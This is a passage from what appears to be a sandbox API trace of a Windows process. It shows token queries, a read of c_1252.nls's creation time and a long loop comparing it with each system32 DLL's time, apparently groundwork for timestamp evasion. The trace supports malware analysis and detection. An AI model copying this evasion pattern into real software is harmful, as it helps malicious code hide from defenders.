SecurityQualityOfService=0x0), ClientId=0x1f4fed8*(UniqueProcess=0x508, UniqueThread=0x0) | out: ProcessHandle=0x1f4fee0*=0x178) returned 0x0 [0055.339] NtOpenProcessToken (in: ProcessHandle=0x178, DesiredAccess=0x8, TokenHandle=0x1f4fee4 | out: TokenHandle=0x1f4fee4*=0x180) returned 0x0 [0055.340] NtQueryInformationToken (in: TokenHandle=0x180, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1f4fef0 | out: TokenInformation=0x0, ReturnLength=0x1f4fef0) returned 0xc0000023 [0055.340] NtQueryInformationToken (in: TokenHandle=0x180, TokenInformationClass=0x1, TokenInformation=0x23585a8, TokenInformationLength=0x24, ReturnLength=0x1f4fef0 | out: TokenInformation=0x23585a8, ReturnLength=0x1f4fef0) returned 0x0 [0055.340] NtClose (Handle=0x180) returned 0x0 [0055.340] NtClose (Handle=0x178) returned 0x0 [0055.340] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x20 [0055.340] ExpandEnvironmentStringsA (in: lpSrc="%systemroot%\\system32\\c_1252.nls", lpDst=0x23586d0, nSize=0x20 | out: lpDst="C:\\Windows\\system32\\c_1252.nls") returned 0x1f [0055.340] CreateFileA (lpFileName="C:\\Windows\\system32\\c_1252.nls" (normalized: "c:\\windows\\system32\\c_1252.nls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0055.341] GetFileTime (in: hFile=0x178, lpCreationTime=0x1f4feac, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x1f4feac*(dwLowDateTime=0x9656d311, dwHighDateTime=0x1d0baff), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0055.341] CloseHandle (hObject=0x178) returned 1 [0055.341] StrRChrA (lpStart="C:\\Windows\\system32\\c_1252.nls", lpEnd=0x0, wMatch=0x5c) returned="\\c_1252.nls" [0055.341] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\*.dll" | out: lpString1="C:\\Windows\\system32\\*.dll") returned="C:\\Windows\\system32\\*.dll" [0055.341] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\*.dll", lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 0x63e308 [0055.341] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.341] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.342] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.342] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.343] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.343] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.344] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.344] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.345] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.345] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] StrChrA (lpStart="cabinet.dll", wMatch=0x2e) returned=".dll" [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.346] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.346] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned -1 [0055.347] FindNextFileA (in: hFindFile=0x63e308, lpFindFileData=0x1f4fd58 | out: lpFindFileData=0x1f4fd58) returned 1 [0055.347] CompareFileTime (lpFileTime1=0x1f4fd6c, lpFileTime2=0x1f4feac) returned 